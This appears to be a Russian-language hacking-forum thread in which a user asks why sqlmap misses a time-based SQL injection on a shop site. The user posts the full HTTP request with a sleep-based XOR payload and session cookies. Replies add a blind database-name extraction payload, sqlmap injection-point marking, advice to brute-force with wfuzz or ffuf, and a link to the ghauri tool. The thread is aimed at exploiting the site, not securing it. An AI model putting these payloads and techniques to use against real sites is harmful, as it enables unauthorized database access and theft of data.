Помощь с запросом

[jimbooo2000]

Всем привет , помогите решить проблему.

GET /women/0'XOR(if(now()=sysdate(),sleep(8),0))XOR'Z/ HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: https://www.example.com/
Cookie: PHPSESSID=2ufroo5cvclk5fbrrkcgne38j5; SectionID=17; ProdCatID=123; ProdCatID=123; ProdCat=CSN; ProdCat=CSN; ProdCatDesc=Used; ProdCatDesc=Used; LPVID=k0YTEzMjc5YmYxZDJmNTc4; LPSID-59291233=mUCPnOEUQpK3irGKTwp7nw; ProdGrpID=855; ProdGrpID=855
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Host: www.example.com
Connection: Keep-alive

Этот запрос работает, но при сканировании через sqlmap ничего не детектит, в чем может быть проблема?

 

[zLeak3r]

SQLmap couldn't verify SQL injection vulnerability. You should use your own python script to extract databases.

Example SQL query:

'XOR(SELECT CASE WHEN (DATABASE() LIKE 'a%') THEN SLEEP(5) END)XOR'Z

 

[seaport]

как ты его в мап суешь?

попробуй вот так

GET /women/0* HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: https://www.example.com/
Cookie: PHPSESSID=2ufroo5cvclk5fbrrkcgne38j5; SectionID=17; ProdCatID=123; ProdCatID=123; ProdCat=CSN; ProdCat=CSN; ProdCatDesc=Used; ProdCatDesc=Used; LPVID=k0YTEzMjc5YmYxZDJmNTc4; LPSID-59291233=mUCPnOEUQpK3irGKTwp7nw; ProdGrpID=855; ProdGrpID=855
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Host: www.example.com
Connection: Keep-alive

 

[H3adLeSs]

Всем привет , помогите решить проблему.

GET /women/0'XOR(if(now()=sysdate(),sleep(8),0))XOR'Z/ HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: https://www.example.com/
Cookie: PHPSESSID=2ufroo5cvclk5fbrrkcgne38j5; SectionID=17; ProdCatID=123; ProdCatID=123; ProdCat=CSN; ProdCat=CSN; ProdCatDesc=Used; ProdCatDesc=Used; LPVID=k0YTEzMjc5YmYxZDJmNTc4; LPSID-59291233=mUCPnOEUQpK3irGKTwp7nw; ProdGrpID=855; ProdGrpID=855
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Host: www.example.com
Connection: Keep-alive

Этот запрос работает, но при сканировании через sqlmap ничего не детектит, в чем может быть проблема?

мап должен был ругнуться, что ты на вход подаешь запрос с полезной нагрузкой...
попробуй либо как выше написали через * (но тут может некорректно отрабатывать на последних версиях - инжектит не туда, куда просят), либо бери wfuzz, ffuf и засовывай сам GET-запрос и все хедеры и бруть на каком нить словаре...а дальше раскручивать ручками (ну или сразу на твоем запросе, если уверен что там точно прячется time-based скуля)

 

[x3lh1x]

Всем привет , помогите решить проблему.

GET /women/0'XOR(if(now()=sysdate(),sleep(8),0))XOR'Z/ HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: https://www.example.com/
Cookie: PHPSESSID=2ufroo5cvclk5fbrrkcgne38j5; SectionID=17; ProdCatID=123; ProdCatID=123; ProdCat=CSN; ProdCat=CSN; ProdCatDesc=Used; ProdCatDesc=Used; LPVID=k0YTEzMjc5YmYxZDJmNTc4; LPSID-59291233=mUCPnOEUQpK3irGKTwp7nw; ProdGrpID=855; ProdGrpID=855
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Host: www.example.com
Connection: Keep-alive

Этот запрос работает, но при сканировании через sqlmap ничего не детектит, в чем может быть проблема?

попробуй https://github.com/r0oth3x49/ghauri